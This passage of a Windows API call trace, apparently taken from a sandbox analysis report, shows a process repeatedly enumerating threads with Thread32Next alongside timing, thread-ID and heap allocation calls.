(hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.626] GetTickCount () returned 0xdf64 [0182.626] GetCurrentThreadId () returned 0x264 [0182.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.627] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.628] GetTickCount () returned 0xdf64 [0182.628] GetCurrentThreadId () returned 0x264 [0182.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.629] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.630] GetTickCount () returned 0xdf64 [0182.630] GetCurrentThreadId () returned 0x264 [0182.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.630] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.631] GetTickCount () returned 0xdf64 [0182.631] GetCurrentThreadId () returned 0x264 [0182.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.632] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.633] GetTickCount () returned 0xdf73 [0182.633] GetCurrentThreadId () returned 0x264 [0182.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.633] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.634] GetTickCount () returned 0xdf73 [0182.634] GetCurrentThreadId () returned 0x264 [0182.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.635] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.636] GetTickCount () returned 0xdf73 [0182.636] GetCurrentThreadId () returned 0x264 [0182.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.637] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.638] GetTickCount () returned 0xdf73 [0182.638] GetCurrentThreadId () returned 0x264 [0182.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.638] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.639] GetTickCount () returned 0xdf73 [0182.639] GetCurrentThreadId () returned 0x264 [0182.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.640] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.643] GetTickCount () returned 0xdf73 [0182.643] GetCurrentThreadId () returned 0x264 [0182.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.644] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.645] GetTickCount () returned 0xdf73 [0182.645] GetCurrentThreadId () returned 0x264 [0182.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.645] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.646] GetTickCount () returned 0xdf73 [0182.647] GetCurrentThreadId () returned 0x264 [0182.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.647] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.649] GetTickCount () returned 0xdf83 [0182.649] GetCurrentThreadId () returned 0x264 [0182.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.649] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.651] GetTickCount () returned 0xdf83 [0182.651] GetCurrentThreadId () returned 0x264 [0182.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.651] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.652] GetTickCount () returned 0xdf83 [0182.652] GetCurrentThreadId () returned 0x264 [0182.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.653] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.654] GetTickCount () returned 0xdf83 [0182.654] GetCurrentThreadId () returned 0x264 [0182.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.654] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.656] GetTickCount () returned 0xdf83 [0182.656] GetCurrentThreadId () returned 0x264 [0182.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.656] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.657] GetTickCount () returned 0xdf83 [0182.657] GetCurrentThreadId () returned 0x264 [0182.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.658] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.659] GetTickCount () returned 0xdf83 [0182.659] GetCurrentThreadId () returned 0x264 [0182.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.659] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.660] GetTickCount () returned 0xdf83 [0182.660] GetCurrentThreadId () returned 0x264 [0182.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.661] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.662] GetTickCount () returned 0xdf83 [0182.662] GetCurrentThreadId () returned 0x264 [0182.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.662] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.663] GetTickCount () returned 0xdf83 [0182.664] GetCurrentThreadId () returned 0x264 [0182.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.664] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.665] GetTickCount () returned 0xdf92 [0182.665] GetCurrentThreadId () returned 0x264 [0182.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.665] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.667] GetTickCount () returned 0xdf92 [0182.667] GetCurrentThreadId () returned 0x264 [0182.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.667] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.668] GetTickCount () returned 0xdf92 [0182.668] GetCurrentThreadId () returned 0x264 [0182.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.668] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.669] GetTickCount () returned 0xdf92 [0182.670] GetCurrentThreadId () returned 0x264 [0182.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.670] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.671] GetTickCount () returned 0xdf92 [0182.671] GetCurrentThreadId () returned 0x264 [0182.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.672] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.673] GetTickCount () returned 0xdf92 [0182.673] GetCurrentThreadId () returned 0x264 [0182.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.673] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.675] GetTickCount () returned 0xdf92 [0182.675] GetCurrentThreadId () returned 0x264 [0182.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.675] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.676] GetTickCount () returned 0xdf92 [0182.676] GetCurrentThreadId () returned 0x264 [0182.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.677] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.678] GetTickCount () returned 0xdf92 [0182.678] GetCurrentThreadId () returned 0x264 [0182.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.678] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.680] GetTickCount () returned 0xdfa2 [0182.680] GetCurrentThreadId () returned 0x264 [0182.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.680] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.682] GetTickCount () returned 0xdfa2 [0182.682] GetCurrentThreadId () returned 0x264 [0182.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.682] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.683] GetTickCount () returned 0xdfa2 [0182.683] GetCurrentThreadId () returned 0x264 [0182.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.684] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.685] GetTickCount () returned 0xdfa2 [0182.685] GetCurrentThreadId () returned 0x264 [0182.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.685] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.686] GetTickCount () returned 0xdfa2 [0182.686] GetCurrentThreadId () returned 0x264 [0182.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.687] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.688] GetTickCount () returned 0xdfa2 [0182.688] GetCurrentThreadId () returned 0x264 [0182.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.689] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.690] GetTickCount () returned 0xdfa2 [0182.690] GetCurrentThreadId () returned 0x264 [0182.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.690] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.692] GetTickCount () returned 0xdfa2 [0182.692] GetCurrentThreadId () returned 0x264 [0182.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.692] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.693] GetTickCount () returned 0xdfa2 [0182.693] GetCurrentThreadId () returned 0x264 [0182.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.694] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.695] GetTickCount () returned 0xdfa2 [0182.695] GetCurrentThreadId () returned 0x264 [0182.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.695] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.696] GetTickCount () returned 0xdfb2 [0182.696] GetCurrentThreadId () returned 0x264 [0182.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.697] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.698] GetTickCount () returned 0xdfb2 [0182.698] GetCurrentThreadId () returned 0x264 [0182.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.699] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.700] GetTickCount () returned 0xdfb2 [0182.700] GetCurrentThreadId () returned 0x264 [0182.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.700] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.701] GetTickCount () returned 0xdfb2 [0182.701] GetCurrentThreadId () returned 0x264 [0182.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.702] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.703] GetTickCount () returned 0xdfb2 [0182.703] GetCurrentThreadId () returned 0x264 [0182.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.704] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.705] GetTickCount () returned 0xdfb2 [0182.705] GetCurrentThreadId () returned 0x264 [0182.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.705] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.707] GetTickCount () returned 0xdfb2 [0182.707] GetCurrentThreadId () returned 0x264 [0182.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.707] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.708] GetTickCount () returned 0xdfb2 [0182.708] GetCurrentThreadId () returned 0x264 [0182.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.709] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.710] GetTickCount () returned 0xdfb2 [0182.710] GetCurrentThreadId () returned 0x264 [0182.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.710] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.712] GetTickCount () returned 0xdfc1 [0182.712] GetCurrentThreadId () returned 0x264 [0182.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.712] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.713] GetTickCount () returned 0xdfc1 [0182.713] GetCurrentThreadId () returned 0x264 [0182.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.714] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.715] GetTickCount () returned 0xdfc1 [0182.715] GetCurrentThreadId () returned 0x264 [0182.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.716] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.717] GetTickCount () returned 0xdfc1 [0182.717] GetCurrentThreadId () returned 0x264 [0182.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.717] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.719] GetTickCount () returned 0xdfc1 [0182.719] GetCurrentThreadId () returned 0x264 [0182.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.719] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.720] GetTickCount () returned 0xdfc1 [0182.720] GetCurrentThreadId () returned 0x264 [0182.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.721] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.722] GetTickCount () returned 0xdfc1 [0182.722] GetCurrentThreadId () returned 0x264 [0182.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.722] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.724] GetTickCount () returned 0xdfc1 [0182.724] GetCurrentThreadId () returned 0x264 [0182.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.724] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.725] GetTickCount () returned 0xdfc1 [0182.725] GetCurrentThreadId () returned 0x264 [0182.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.726] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.728] GetTickCount () returned 0xdfd1 [0182.728] GetCurrentThreadId () returned 0x264 [0182.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.728] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.729] GetTickCount () returned 0xdfd1 [0182.729] GetCurrentThreadId () returned 0x264 [0182.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.730] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.731] GetTickCount () returned 0xdfd1 [0182.731] GetCurrentThreadId () returned 0x264 [0182.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.731] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.733] GetTickCount () returned 0xdfd1 [0182.733] GetCurrentThreadId () returned 0x264 [0182.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.733] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.734] GetTickCount () returned 0xdfd1 [0182.734] GetCurrentThreadId () returned 0x264 [0182.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.735] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.736] GetTickCount () returned 0xdfd1 [0182.736] GetCurrentThreadId () returned 0x264 [0182.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.736] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.738] GetTickCount () returned 0xdfd1 [0182.738] GetCurrentThreadId () returned 0x264 [0182.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.738] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.739] GetTickCount () returned 0xdfd1 [0182.739] GetCurrentThreadId () returned 0x264 [0182.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.740] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.741] GetTickCount () returned 0xdfd1 [0182.741] GetCurrentThreadId () returned 0x264 [0182.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.742] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.743] GetTickCount () returned 0xdfe0 [0182.743] GetCurrentThreadId () returned 0x264 [0182.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.744] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.745] GetTickCount () returned 0xdfe0 [0182.745] GetCurrentThreadId () returned 0x264 [0182.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.745] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.747] GetTickCount () returned 0xdfe0 [0182.747] GetCurrentThreadId () returned 0x264 [0182.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.747] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.748] GetTickCount () returned 